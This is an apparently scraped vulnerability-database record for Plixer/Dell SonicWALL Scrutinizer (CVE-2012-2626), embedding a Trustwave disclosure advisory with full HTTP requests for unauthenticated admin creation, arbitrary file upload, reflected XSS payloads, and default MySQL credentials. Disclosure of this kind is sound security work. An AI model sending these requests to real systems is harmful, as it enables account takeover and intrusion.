"data": "Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003435"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-592"
}
],
"trust": 0.7
}
}
var-201207-0528
Vulnerability from variot
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action. Scrutinizer is prone to an authentication-bypass vulnerability. Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. A remote attacker could exploit this vulnerability to add an administrative account through the manipulation of user preferences. Trustwave SpiderLabs Security Advisory TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12 Version: 1.0
Vendor: Plixer International (http://www.plixer.com) Product: Scrutinizer NetFlow and sFlow Analyzer Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions may be affected as well. Please note that the software can be found in a long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html for the partial list.
Product description: Network analysis tool for monitoring the overall network health and reports on which hosts, applications, protocols, etc. that are consuming network bandwidth.
Credits: Mario Ceballos of the Metasploit Project Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring users to authenticate to gain access to further functionality. A tiered user access model is also used, where administrative and standard users have a different selection of permissible functions. Authentication and authorization is controlled by the cookie-based session management system. Although this is implemented in a standardized way, the session tokens are not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of "trustwave" to the administrative user group.
Request
POST /cgi-bin/admin.cgi HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
Response
HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:52:15 GMT Server: Apache Vary: Accept-Encoding Content-Length: 19 Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload vulnerability. An attacker could exploit this vulnerability to upload files to the affected systems file system as well as overwrite the Scrutinizer applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could be overwritten if an attacker were to select the right file name.
Request
POST /d4d/uploader.php HTTP/1.0 Host: A.B.C.D User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593 Content-Length: 210
--_Part_949_3365333252_3066945593 Content-Disposition: form-data; name="uploadedfile"; filename="trustwave.txt" Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
Response
HTTP/1.1 200 OK Date: Wed, 25 Apr 2012 17:39:15 GMT Server: Apache X-Powered-By: PHP/5.3.3 Vary: Accept-Encoding Content-Length: 41 Connection: close Content-Type: text/html
{"success":1,"file_name":"trustwave.txt"}
Confirming on File System
C:>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt" trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting vulnerabilities in the following pages:
1.) /d4d/contextMenu.php 2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter 3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php
Request 1
GET /d4d/exporters.php?aalert(123)=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive
Response 1
/d4d/exporters.php?aalert(123)=1
Request 2
GET /d4d/exporters.php HTTP/1.1 Host: A.B.C.D Accept: / Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://D.E.F.G/search?hl=en&q=aalert(123)=1 Content-Length: 2
Response 2
http://D.E.F.G/search?hl=en&q=aalert(123)=1
Finding 4: Undocumented Default Admin MySQL Users CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP installation which is installed as part of the scrutinizer installer package. The installation of these packages are transparent to the user during the Scrutinizer installation.
The installation selects default passwords for internal MySQL Users which are not configured by the user which could be easily guessed by an attacker. There is currently no way to change these values within the Scrutinizer application and changing them manually in the MySQL instance has unknown effects on the application due to hardcoded values for some of these accounts.
Example(s):
The following MySQL command can be run to see the users and their relative passwords:
Request
select User,Password from mysql.user;
Response
User |Password root | root | scrutinizer |4ACFE3202A5FF5CF467898FC58AAB1D615029441 scrutremote |4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the above hash shared between the 'scrutinizer' and 'scrutremote' users is equivalent to 'admin'
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update, delete, create, drop, and more permissions within the MySQL instance.
Note 3: By default, the MySQL instance is bound to "0.0.0.0", the equivalent of every network interface on the system allowing users with the proper access rights to interact directly with the MySQL instance.
Remediation Steps: Customers should update to the latest version of Scrutinizer NetFlow & sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been corrected in version 9.5.0.
Revision History: 05/02/12 - Vulnerability disclosed 05/16/12 - Patch released by vendor 07/11/12 - Vendor publishes announcement 07/27/12 - Advisory published
References 1. http://www.plixer.com 2. http://blog.spiderlabs.com
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201207-0528",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "scrutinizer",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "9.5.0"
},
{
"model": "sonicwall scrutinizer",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "9.5.0"
},
{
"model": "sonicwall scrutinizer with flow analytics module",
"scope": "lt",
"trust": 0.8,
"vendor": "dell",
"version": "9.5.0"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.0.0"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "9.0.1"
},
{
"model": "scrutinizer",
"scope": "eq",
"trust": 0.6,
"vendor": "sonicwall",
"version": "8.6.2"
},
{
"model": "international scrutinizer",
"scope": "eq",
"trust": 0.3,
"vendor": "plixer",
"version": "9.0.1.19899"
}
],
"sources": [
{
"db": "BID",
"id": "54727"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-594"
},
{
"db": "NVD",
"id": "CVE-2012-2626"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer_with_flow_analytics_module",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mario Ceballos of the Metasploit Project and Jonathan Claudius of Trustwave Spiderlabs",
"sources": [
{
"db": "BID",
"id": "54727"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-594"
}
],
"trust": 0.9
},
"cve": "CVE-2012-2626",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2012-2626",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-55907",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2012-2626",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2012-2626",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201207-594",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-55907",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-55907"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-594"
},
{
"db": "NVD",
"id": "CVE-2012-2626"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action. Scrutinizer is prone to an authentication-bypass vulnerability. \nExploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions. \nScrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. A remote attacker could exploit this vulnerability to add an administrative account through the manipulation of user preferences. Trustwave SpiderLabs Security Advisory TWSL2012-014:\nMultiple Vulnerabilities in Scrutinizer NetFlow \u0026 sFlow Analyzer\n\nPublished: 07/27/12\nVersion: 1.0\n\nVendor: Plixer International (http://www.plixer.com)\nProduct: Scrutinizer NetFlow and sFlow Analyzer\nVersion affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions\nmay be affected as well. Please note that the software can be found in a\nlong list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html\nfor the partial list. \n\nProduct description:\nNetwork analysis tool for monitoring the overall network health and reports\non which hosts, applications, protocols, etc. that are consuming network\nbandwidth. \n\nCredits:\nMario Ceballos of the Metasploit Project\nJonathan Claudius of Trustwave Spiderlabs\n\nFinding 1: HTTP Authentication Bypass Vulnerability\nCVE: CVE-2012-2626\n\nThe Scrutinizer web console provides a form-based login facility, requiring\nusers to authenticate to gain access to further functionality. A tiered\nuser access model is also used, where administrative and standard users\nhave a different selection of permissible functions. Authentication and\nauthorization is controlled by the cookie-based session management system. \nAlthough this is implemented in a standardized way, the session tokens are\nnot required to perform privileged functions, such as adding users. \n\nExample(s):\n\nThis request will add a user named \"trustwave\" with the password of\n\"trustwave\" to the administrative user group. \n\n#Request\nPOST /cgi-bin/admin.cgi HTTP/1.1\nHost: A.B.C.D\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nContent-Length: 70\n\ntool=userprefs\u0026newUser=trustwave\u0026pwd=trustwave\u0026selectedUserGroup=1\n\n#Response\nHTTP/1.1 200 OK\nDate: Wed, 25 Apr 2012 17:52:15 GMT\nServer: Apache\nVary: Accept-Encoding\nContent-Length: 19\nContent-Type: text/html; charset=utf-8\n\n{\"new_user_id\":\"2\"}\n\n\nFinding 2: Arbitrary File Upload Vulnerability\nCVE: CVE-2012-2627\n\nThe Scrutinizer web console is prone to unauthenticated arbitrary file upload\nvulnerability. An attacker could exploit this vulnerability to upload files\nto the affected systems file system as well as overwrite the Scrutinizer\napplications SNMP configuration. \n\nExample(s):\n\nThis request will upload a test file to the following location:\n\n\u0027C:\\Program Files (x86)\\Scrutinizer\\snmp\\mibs\\trustwave.txt\u0027\n\nNote: This affected folder also contains SNMP configuration files which could\nbe overwritten if an attacker were to select the right file name. \n\n#Request\nPOST /d4d/uploader.php HTTP/1.0\nHost: A.B.C.D\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nContent-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593\nContent-Length: 210\n\n\n--_Part_949_3365333252_3066945593\nContent-Disposition: form-data;\nname=\"uploadedfile\"; filename=\"trustwave.txt\"\nContent-Type: application/octet-stream\n\ntrustwave\n\n--_Part_949_3365333252_3066945593--\n\n#Response\nHTTP/1.1 200 OK\nDate: Wed, 25 Apr 2012 17:39:15 GMT\nServer: Apache\nX-Powered-By: PHP/5.3.3\nVary: Accept-Encoding\nContent-Length: 41\nConnection: close\nContent-Type: text/html\n\n{\"success\":1,\"file_name\":\"trustwave.txt\"}\n\n#Confirming on File System\nC:\\\u003etype \"Program Files (x86)\\Scrutinizer\\snmp\\mibs\\trustwave.txt\"\ntrustwave\n\n\nFinding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php\nCVE: CVE-2012-3848\n\nThe Scrutinizer web console suffers from multiple Cross Site Scripting\nvulnerabilities in the following pages:\n\n1.) /d4d/contextMenu.php\n2.) /d4d/exporters.php\n\nThese vulnerabilities include the following:\n\n1.) XSS via arbitrary parameter\n3.) XSS via referrer header\n\nExample(s):\n\nThe following two examples will demonstrate the the above mentioned vulnerabilities on exporters.php\n\n#Request 1\nGET /d4d/exporters.php?a\u003cscript\u003ealert(123)\u003c/script\u003e=1 HTTP/1.1\nHost: A.B.C.D\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-us,en;q=0.5\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\n\n#Response 1\n\u003csnip\u003e\n\u003ca href=\"/d4d/exporters.php?a\u003cscript\u003ealert(1)\u003c/script\u003e=1\"\u003e/d4d/exporters.php?a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\n\u003csnip\u003e\n\n#Request 2\nGET /d4d/exporters.php HTTP/1.1\nHost: A.B.C.D\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)\nConnection: close\nReferer: http://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\nContent-Length: 2\n\n#Response 2\n\u003csnip\u003e\n\u003ca href=\"http://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\"\u003ehttp://D.E.F.G/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e\n\u003csnip\u003e\n\nFinding 4: Undocumented Default Admin MySQL Users\nCVE: CVE-2012-3951\n\nThe Scrutinizer application relies on an underlying Apache, MySQL and PHP\ninstallation which is installed as part of the scrutinizer installer\npackage. The installation of these packages are transparent to the user\nduring the Scrutinizer installation. \n\nThe installation selects default passwords for internal MySQL Users which\nare not configured by the user which could be easily guessed by an\nattacker. There is currently no way to change these values within the\nScrutinizer application and changing them manually in the MySQL instance\nhas unknown effects on the application due to hardcoded values for some of\nthese accounts. \n\nExample(s):\n\nThe following MySQL command can be run to see the users and their relative\npasswords:\n\n#Request\nselect User,Password from mysql.user;\n\n#Response\nUser |Password\nroot |\nroot |\nscrutinizer |*4ACFE3202A5FF5CF467898FC58AAB1D615029441\nscrutremote |*4ACFE3202A5FF5CF467898FC58AAB1D615029441\n\nNote 1: the above hash shared between the \u0027scrutinizer\u0027 and \u0027scrutremote\u0027\nusers is equivalent to \u0027admin\u0027\n\nNote 2: the \u0027scrutinizer\u0027 and \u0027scrutremote\u0027 users have select, update,\ndelete, create, drop, and more permissions within the MySQL instance. \n\nNote 3: By default, the MySQL instance is bound to \"0.0.0.0\", the\nequivalent of every network interface on the system allowing users with the\nproper access rights to interact directly with the MySQL instance. \n\n\nRemediation Steps:\nCustomers should update to the latest version of Scrutinizer NetFlow \u0026\nsFlow Analyzer in order to address findings 1, 2 and 3. These issues have been\ncorrected in version 9.5.0. \n\nRevision History:\n05/02/12 - Vulnerability disclosed\n05/16/12 - Patch released by vendor\n07/11/12 - Vendor publishes announcement\n07/27/12 - Advisory published\n\nReferences\n1. http://www.plixer.com\n2. http://blog.spiderlabs.com\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2626"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
},
{
"db": "BID",
"id": "54727"
},
{
"db": "VULHUB",
"id": "VHN-55907"
},
{
"db": "PACKETSTORM",
"id": "115091"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-55907",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-55907"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-2626",
"trust": 2.9
},
{
"db": "BID",
"id": "54727",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003433",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201207-594",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "115091",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "37549",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-55907",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-55907"
},
{
"db": "BID",
"id": "54727"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-594"
},
{
"db": "NVD",
"id": "CVE-2012-2626"
}
]
},
"id": "VAR-201207-0528",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-55907"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:35:27.846000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dell SonicWALL Scrutinizer",
"trust": 0.8,
"url": "http://www.dell.com/us/business/p/sonicwall-scrutinizer/pd"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-55907"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
},
{
"db": "NVD",
"id": "CVE-2012-2626"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://www.trustwave.com/spiderlabs/advisories/twsl2012-014.txt"
},
{
"trust": 2.5,
"url": "http://www.plixer.com/press-releases/plixer-releases-9-5-2.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2626"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2626"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/54727"
},
{
"trust": 0.4,
"url": "http://www.plixer.com"
},
{
"trust": 0.1,
"url": "http://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\"\u003ehttp://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e"
},
{
"trust": 0.1,
"url": "http://blog.spiderlabs.com"
},
{
"trust": 0.1,
"url": "http://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://www.plixer.com/scrutinizer-netflow-sflow/scrutinizer.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3951"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2626"
},
{
"trust": 0.1,
"url": "http://www.plixer.com)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3848"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2627"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-55907"
},
{
"db": "BID",
"id": "54727"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-594"
},
{
"db": "NVD",
"id": "CVE-2012-2626"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-55907"
},
{
"db": "BID",
"id": "54727"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003433"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-594"
},
{
"db": "NVD",
